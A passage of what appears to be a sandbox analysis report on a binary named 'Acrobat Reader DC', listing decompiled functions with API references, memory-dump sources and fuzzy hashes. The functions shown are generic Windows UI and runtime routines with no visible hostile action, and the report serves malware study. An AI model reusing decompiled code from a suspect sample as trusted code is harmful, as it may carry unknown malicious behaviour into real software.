                                  				}
                                  			}

                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00442A83(intOrPtr _a4) {
                                  				struct tagMSG _v32;
                                  				void* __ebx;
                                  				int _t28;
                                  				intOrPtr _t41;
                                  
                                  				_t41 = _a4;
                                  				if( *0x4974e3 != 0 ||  *0x4a8668 != 0 &&  *(_t41 + 0xf8) == 0) {
                                  					return 0;
                                  				} else {
                                  					_t28 = 1;
                                  					if(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
                                  						while(_v32.message != 0x12) {
                                  							if(E0040D150(0x4a8630,  &_v32) == 0) {
                                  								if(E0040D170(0x4a8630,  &_v32) == 0) {
                                  									TranslateMessage( &_v32);
                                  									DispatchMessageW( &_v32);
                                  								}
                                  								_t28 = 1;
                                  							}
                                  							if(PeekMessageW( &_v32, 0, 0, 0, _t28) != 0) {
                                  								continue;
                                  							} else {
                                  							}
                                  							goto L14;
                                  						}
                                  						 *(_t41 + 0xfc) = _t28;
                                  						 *(_t41 + 0xf8) = _t28;
                                  					}
                                  					L14:
                                  					if( *0x4974e6 == _t28) {
                                  						 *0x4974ec = 0;
                                  						 *0x4974e6 = 0;
                                  						 *(_t41 + 0xf8) = _t28;
                                  					}
                                  					if( *(_t41 + 0xf8) != _t28) {
                                  						asm("sbb eax, eax");
                                  						return  ~( *0x4974ec & 0x000000ff) & 0x0000000b;
                                  					} else {
                                  						return _t28;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E0C0(intOrPtr __esi, void* __fp0) {
                                  				struct _NOTIFYICONDATAW _v940;
                                  				struct HICON__* _t31;
                                  				long _t33;
                                  				long _t34;
                                  				intOrPtr _t41;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				long _t51;
                                  				intOrPtr _t53;
                                  				void* _t64;
                                  
                                  				_t64 = __fp0;
                                  				_t53 = __esi;
                                  				_v940.cbSize = 0x3a8;
                                  				E00412F40( &(_v940.hWnd), 0, 0x3a4);
                                  				if( *((intOrPtr*)(__esi + 0x198)) == 0) {
                                  					_t48 =  *0x4a7f44; // 0xf045b
                                  					 *((intOrPtr*)(__esi + 0x198)) = _t48;
                                  				}
                                  				if( *((intOrPtr*)(_t53 + 0x1a4)) == 0) {
                                  					_t41 =  *0x4a7f48; // 0xf043f
                                  					 *((intOrPtr*)(_t53 + 0x1a4)) = _t41;
                                  					 *((intOrPtr*)(_t53 + 0x1a8)) = _t41;
                                  				}
                                  				if( *((intOrPtr*)(_t53 + 0x1b0)) == 0) {
                                  					_t47 =  *0x4a7f4c; // 0x3702d5
                                  					 *((intOrPtr*)(_t53 + 0x1b0)) = _t47;
                                  				}
                                  				_t10 = _t53 + 0x19c; // 0x0
                                  				_t31 =  *_t10;
                                  				_t11 = _t53 + 0x1a0; // 0x4a88b0
                                  				_t51 = _t11;
                                  				if(_t31 != 0) {
                                  					if( *_t51 != 0) {
                                  						DestroyIcon(_t31);
                                  					}
                                  				}
                                  				 *(_t53 + 0x19c) = 0;
                                  				 *_t51 = 0;
                                  				_v940.hWnd =  *0x497518;
                                  				_v940.uID = 1;
                                  				_v940.uFlags = 3;
                                  				_v940.uCallbackMessage = 0x401;
                                  				_v940.hIcon = 0;
                                  				if( *((intOrPtr*)(_t53 + 0x40)) != 0) {
                                  					_t23 = _t53 + 0x3c; // 0xa719b0
                                  					_t24 = _t53 + 0x10; // 0xffffffff
                                  					_t33 = E004341E6(_t53,  *_t24,  *_t23, _t51);
                                  					_v940.hWnd = _t33;
                                  					 *(_t53 + 0x19c) = _t33;
                                  					if( *((intOrPtr*)(_t53 + 0x40)) == 0) {
                                  						goto L8;
                                  					}
                                  					if(_t33 != 0) {
                                  						goto L9;
                                  					}
                                  					goto L8;
                                  				} else {
                                  					L8:
                                  					_t19 = _t53 + 0x198; // 0x0
                                  					_t34 =  *_t19;
                                  					_v940.hIcon = _t34;
                                  					 *(_t53 + 0x19c) = _t34;
                                  					L9:
                                  					if( *0x4974ea == 1) {
                                  						Shell_NotifyIconW(1,  &_v940);
                                  					} else {
                                  						Shell_NotifyIconW(0,  &_v940);
                                  						 *0x4974ea = 1;
                                  					}
                                  					return E00401B80(_t53, _t64);
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0040E0E2
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell__memset
                                  • String ID:
                                  • API String ID: 928536360-0
                                  • Opcode ID: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                  • Opcode Fuzzy Hash: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00434CC9(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr* _a8, short* _a12) {
                                  				void* __edi;
                                  				void* __esi;
                                  				short _t25;
                                  				WCHAR* _t33;
                                  				int _t34;
                                  				WCHAR* _t38;
                                  				signed int _t52;
                                  				signed int _t53;
                                  				void* _t56;
                                  				WCHAR* _t57;
                                  				void* _t65;
                                  
                                  				_t38 = _a4;
                                  				 *_a8 = 4;
                                  				_t25 = E00434C09(__ecx, __eflags, _t38);
                                  				 *_a12 = _t25;
                                  				_t65 = _t25 - 0xffff;
                                  				if(_t65 != 0) {
                                  					return _t25;
                                  				} else {
                                  					_push(_t56);
                                  					_t52 = lstrlenW(_t38);
                                  					_t4 = _t52 + 1; // 0x1
                                  					_push( ~(0 | _t65 > 0x00000000) | _t4 * 0x00000002);
                                  					_t57 = E004115D7(_t52, _t56, _t65);
                                  					lstrcpyW(_t57, _t38);
                                  					_t57[_t52] = 0;
                                  					_t53 = 0;
                                  					if( *_t57 == 0) {
                                  						L9:
                                  						_push(_t57);
                                  						return E004111DC();
                                  					}
                                  					_t33 = _t57;
                                  					while( *_t33 != 0x3a) {
                                  						_t53 = _t53 + 1;
                                  						_t33 =  &(_t57[_t53]);
                                  						if(_t57[_t53] != 0) {
                                  							continue;
                                  						}
                                  						_push(_t57);
                                  						return E004111DC();
                                  						goto L11;
                                  					}
                                  					_t18 = _t53 * 2; // 0x2
                                  					_t45 = _t57 + _t18 + 2;
                                  					_t34 = lstrcmpiW(_t57 + _t18 + 2, L"cdecl");
                                  					__eflags = _t34;
                                  					if(_t34 == 0) {
                                  						 *_a8 = 1;
                                  					}
                                  					__eflags = 0;
                                  					_t57[_t53] = 0;
                                  					 *_a12 = E00434C09(_t45, 0, _t57);
                                  					goto L9;
                                  				}
                                  				L11:
                                  			}















                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32 ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32 ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004368A0(void* _a4, intOrPtr* _a8) {
                                  				int _v8;
                                  				void* _v12;
                                  				int _t16;
                                  				long _t29;
                                  				struct HWND__** _t38;
                                  
                                  				_t38 = _a4;
                                  				SendMessageW( *_t38, 0xb0,  &_a4,  &_v12);
                                  				_t16 = _a4;
                                  				_v8 = _t16;
                                  				_t29 = SendMessageW( *_t38, 0xc9, _t16, 0);
                                  				if(_t29 < 1) {
                                  					 *_a8 = _a4 + 1;
                                  					return 1;
                                  				} else {
                                  					if(_t29 == SendMessageW( *_t38, 0xc9, _a4, 0)) {
                                  						do {
                                  							_a4 = _a4 - 1;
                                  						} while (_t29 == SendMessageW( *_t38, 0xc9, _a4 - 1, 0));
                                  					}
                                  					 *_a8 = _v8 - _a4;
                                  					return 1;
                                  				}
                                  			}









                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004301F8(struct HWND__** _a4, long _a8, WCHAR* _a12, WCHAR* _a16, signed int _a20, int _a24, int _a28, int _a32, int _a36, struct HMENU__* _a40, char _a44) {
                                  				long _t16;
                                  				long _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HWND__** _t33;
                                  				struct HWND__* _t34;
                                  
                                  				_t16 = _a8;
                                  				_t23 = _a20 | 0x50000000;
                                  				_t33 = _a4;
                                  				if((_t16 & 0x00080000) != 0) {
                                  					_t16 = _t16 & 0xfff7ffff;
                                  				}
                                  				_t25 =  *0x4a8684; // 0x400000
                                  				_t34 = CreateWindowExW(_t16, _a12, _a16, _t23, _a24, _a28, _a32, _a36,  *_t33, _a40, _t25, 0);
                                  				if(_t34 != 0) {
                                  					if(_a44 != 0) {
                                  						SendMessageW(_t34, 0x30, GetStockObject(0x11), 0);
                                  					}
                                  					if(_t33[0x64] >= 0 && _t33[0x67] != 0) {
                                  						ShowWindow(_t34, 0);
                                  					}
                                  				}
                                  				return _t34;
                                  			}









                                  APIs
                                  • CreateWindowExW.USER32 ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443C87(struct HWND__* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char _a20) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				signed int _t11;
                                  				char _t22;
                                  				signed int _t23;
                                  				void* _t24;
                                  
                                  				_t22 = _a20;
                                  				_t24 = 0;
                                  				 *0x4974ee = 0;
                                  				if(_t22 != 0) {
                                  					 *0x4974ef = 1;
                                  					_v12 = GetCurrentThreadId();
                                  					_v8 = _t22;
                                  					_t24 = E00413D7F(0, 0, E00443B61,  &_v12, 0,  &_a20);
                                  				}
                                  				_t11 = MessageBoxW(_a4, _a8, _a12, _a16);
                                  				_t23 = _t11;
                                  				if(_t24 != 0) {
                                  					 *0x4974ef = 0;
                                  					WaitForSingleObject(_t24, 0xffffffff);
                                  					_t11 = CloseHandle(_t24);
                                  				}
                                  				if( *0x4974ee != 1) {
                                  					return _t23;
                                  				} else {
                                  					return _t11 | 0xffffffff;
                                  				}
                                  			}










                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430B87(struct HWND__** _a4, struct HWND__** _a8, int _a12) {
                                  				struct tagPOINT _v16;
                                  				struct tagRECT _v32;
                                  				void* _t25;
                                  				struct HWND__** _t49;
                                  
                                  				_t49 = _a4;
                                  				if(_t49[0xe] == 0) {
                                  					GetWindowRect( *_a8,  &_v32);
                                  					_v16.x = _v32.left;
                                  					_v16.y = _v32.top;
                                  					ScreenToClient( *_t49,  &_v16);
                                  					_v32.top = _v16.y;
                                  					_v16.x = _v32.right;
                                  					_v32.left = _v16.x;
                                  					_v16.y = _v32.bottom;
                                  					ScreenToClient( *_t49,  &_v16);
                                  					_v32.right = _v16.x;
                                  					_v32.bottom = _v16.y;
                                  					return InvalidateRect( *_t49,  &_v32, _a12);
                                  				}
                                  				return _t25;
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433908(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                  				char _v12;
                                  				char _v20;
                                  				char _v536;
                                  				char _v1052;
                                  				char _v1568;
                                  				char _v2084;
                                  
                                  				_t41 = __edi;
                                  				E00413A0E(_a4,  &_v20,  &_v2084,  &_v1568,  &_v536);
                                  				E00413A0E(_a8,  &_v12,  &_v1052,  &_v1568,  &_v536);
                                  				if(_v20 != 0 || _v12 != 0) {
                                  					return E004114AB(_t41,  &_v20,  &_v12) & 0xffffff00 | _t28 != 0x00000000;
                                  				} else {
                                  					return E004114AB(__edi,  &_v2084,  &_v1052) & 0xffffff00 | _t30 != 0x00000000;
                                  				}
                                  			}










                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00421E33(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                  				intOrPtr _t25;
                                  				void* _t26;
                                  				void* _t29;
                                  
                                  				_t25 = _a16;
                                  				if(_t25 == 0x65 || _t25 == 0x45) {
                                  					_t26 = E00421725(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                  					goto L9;
                                  				} else {
                                  					_t35 = _t25 - 0x66;
                                  					if(_t25 != 0x66) {
                                  						__eflags = _t25 - 0x61;
                                  						if(_t25 == 0x61) {
                                  							L7:
                                  							_t26 = E0042180C(_a4, _a8, _a12, _a20, _a24, _a28);
                                  						} else {
                                  							__eflags = _t25 - 0x41;
                                  							if(__eflags == 0) {
                                  								goto L7;
                                  							} else {
                                  								_t26 = E00421D46(__ebx, _t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                  							}
                                  						}
                                  						L9:
                                  						return _t26;
                                  					} else {
                                  						return E00421C85(__ebx, _t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                  					}
                                  				}
                                  			}







                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
